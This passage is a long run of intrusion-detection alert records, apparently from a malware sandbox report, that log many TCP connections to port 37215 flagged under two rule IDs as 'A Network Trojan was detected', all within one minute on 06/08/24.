          SID:2829579
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745834
          SID:2835222
          Source Port:55734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859648
          SID:2835222
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191959
          SID:2835222
          Source Port:54780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273531
          SID:2829579
          Source Port:34102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548579
          SID:2829579
          Source Port:42392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176989
          SID:2829579
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180063
          SID:2829579
          Source Port:47968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554459
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707732
          SID:2835222
          Source Port:34266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356391
          SID:2835222
          Source Port:41130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893550
          SID:2835222
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734597
          SID:2829579
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401886
          SID:2835222
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463082
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163220
          SID:2829579
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2829579
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797717
          SID:2829579
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356789
          SID:2835222
          Source Port:42618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740565
          SID:2835222
          Source Port:34152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471419
          SID:2835222
          Source Port:48226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462703
          SID:2835222
          Source Port:47246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462128
          SID:2835222
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306517
          SID:2829579
          Source Port:43252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352061
          SID:2829579
          Source Port:42952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260696
          SID:2835222
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512367
          SID:2835222
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403575
          SID:2829579
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551887
          SID:2835222
          Source Port:38788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554604
          SID:2829579
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271487
          SID:2829579
          Source Port:43738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547781
          SID:2829579
          Source Port:55626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731835
          SID:2835222
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293388
          SID:2829579
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409515
          SID:2835222
          Source Port:37678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132093
          SID:2835222
          Source Port:43782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829519
          SID:2835222
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132026
          SID:2835222
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732815
          SID:2835222
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551590
          SID:2835222
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791929
          SID:2829579
          Source Port:45798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471933
          SID:2829579
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781228
          SID:2829579
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241067
          SID:2835222
          Source Port:58002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037210
          SID:2829579
          Source Port:45240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020570
          SID:2835222
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042068
          SID:2835222
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837472
          SID:2829579
          Source Port:34286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263948
          SID:2829579
          Source Port:42338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353959
          SID:2829579
          Source Port:39900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896670
          SID:2829579
          Source Port:54360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276260
          SID:2835222
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295736
          SID:2829579
          Source Port:40318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676229
          SID:2829579
          Source Port:48892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005732
          SID:2829579
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744044
          SID:2829579
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465962
          SID:2835222
          Source Port:37250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464038
          SID:2835222
          Source Port:35220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407331
          SID:2835222
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732693
          SID:2829579
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020324
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352310
          SID:2835222
          Source Port:46500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114335
          SID:2835222
          Source Port:58842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748001
          SID:2835222
          Source Port:56186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2835222
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299641
          SID:2835222
          Source Port:57110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403501
          SID:2835222
          Source Port:34882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606278
          SID:2835222
          Source Port:51098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265901
          SID:2835222
          Source Port:48014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745932
          SID:2829579
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897618
          SID:2835222
          Source Port:35246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242206
          SID:2829579
          Source Port:47796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353280
          SID:2829579
          Source Port:41254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884546
          SID:2835222
          Source Port:54328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306187
          SID:2835222
          Source Port:37872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860980
          SID:2829579
          Source Port:51492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551823
          SID:2835222
          Source Port:41052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894329
          SID:2835222
          Source Port:37816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264148
          SID:2829579
          Source Port:59162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733061
          SID:2829579
          Source Port:47532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599257
          SID:2835222
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044083
          SID:2829579
          Source Port:59362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732494
          SID:2835222
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020595
          SID:2835222
          Source Port:42216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740531
          SID:2829579
          Source Port:37406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604690
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133779
          SID:2835222
          Source Port:47038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135880
          SID:2835222
          Source Port:51900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602045
          SID:2829579
          Source Port:39108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020352
          SID:2829579
          Source Port:54412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780512
          SID:2829579
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395340
          SID:2829579
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860628
          SID:2835222
          Source Port:47928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178911
          SID:2829579
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446293
          SID:2829579
          Source Port:51304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599739
          SID:2835222
          Source Port:56294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135604
          SID:2835222
          Source Port:52910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466632
          SID:2835222
          Source Port:56700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178064
          SID:2829579
          Source Port:59440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396884
          SID:2829579
          Source Port:35372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404442
          SID:2835222
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517984
          SID:2835222
          Source Port:39426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747814
          SID:2835222
          Source Port:42664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824327
          SID:2829579
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265961
          SID:2835222
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599993
          SID:2835222
          Source Port:42480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005597
          SID:2835222
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446884
          SID:2829579
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460989
          SID:2829579
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402319
          SID:2829579
          Source Port:52162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154109
          SID:2829579
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742791
          SID:2835222
          Source Port:48978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022167
          SID:2829579
          Source Port:53376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378254
          SID:2835222
          Source Port:48142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173302
          SID:2829579
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857969
          SID:2829579
          Source Port:55188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303014
          SID:2835222
          Source Port:59404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015904
          SID:2829579
          Source Port:56820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800728
          SID:2829579
          Source Port:58868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788922
          SID:2835222
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267977
          SID:2835222
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736994
          SID:2835222
          Source Port:46640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798396
          SID:2835222
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017286
          SID:2835222
          Source Port:39736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901769
          SID:2829579
          Source Port:56960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272267
          SID:2835222
          Source Port:46992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135412
          SID:2829579
          Source Port:36156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306214
          SID:2835222
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603320
          SID:2829579
          Source Port:37830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783064
          SID:2835222
          Source Port:59262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600504
          SID:2835222
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109395
          SID:2829579
          Source Port:51636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887916
          SID:2835222
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173220
          SID:2829579
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513310
          SID:2829579
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667594
          SID:2829579
          Source Port:60710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112144
          SID:2835222
          Source Port:35842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600112
          SID:2829579
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793349
          SID:2835222
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672888
          SID:2835222
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158025
          SID:2829579
          Source Port:59386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514094
          SID:2829579
          Source Port:41714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545478
          SID:2835222
          Source Port:46630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177061
          SID:2835222
          Source Port:50094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352591
          SID:2829579
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894000
          SID:2835222
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740299
          SID:2829579
          Source Port:48138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810778
          SID:2835222
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731145
          SID:2835222
          Source Port:38408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270736
          SID:2835222
          Source Port:53782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113875
          SID:2829579
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745717
          SID:2829579
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404657
          SID:2835222
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402564
          SID:2829579
          Source Port:41432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514495
          SID:2835222
          Source Port:50678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180203
          SID:2835222
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462290
          SID:2829579
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168297
          SID:2829579
          Source Port:39748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449802
          SID:2835222
          Source Port:43154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295595
          SID:2829579
          Source Port:41454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743487
          SID:2829579
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174168
          SID:2829579
          Source Port:49122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896415
          SID:2829579
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782660
          SID:2829579
          Source Port:46810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549181
          SID:2829579
          Source Port:52766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016134
          SID:2835222
          Source Port:54152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350946
          SID:2829579
          Source Port:49220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673583
          SID:2835222
          Source Port:58206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912596
          SID:2829579
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456390
          SID:2835222
          Source Port:46024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270770
          SID:2829579
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796368
          SID:2829579
          Source Port:57748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834405
          SID:2835222
          Source Port:48562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259768
          SID:2829579
          Source Port:38266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242718
          SID:2829579
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800353
          SID:2835222
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792081
          SID:2835222
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802573
          SID:2829579
          Source Port:55898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709707
          SID:2835222
          Source Port:55768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158084
          SID:2835222
          Source Port:43328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440652
          SID:2835222
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513798
          SID:2829579
          Source Port:56730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465019
          SID:2835222
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237991
          SID:2835222
          Source Port:44564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670572
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731705
          SID:2829579
          Source Port:35226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602011
          SID:2829579
          Source Port:34298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239216
          SID:2835222
          Source Port:60310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891807
          SID:2835222
          Source Port:55414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464103
          SID:2835222
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261007
          SID:2835222
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912194
          SID:2835222
          Source Port:49668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444524
          SID:2829579
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177329
          SID:2829579
          Source Port:48960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274076
          SID:2835222
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673578
          SID:2835222
          Source Port:35176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035795
          SID:2835222
          Source Port:35648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014870
          SID:2835222
          Source Port:39916
          Destination Port:37215
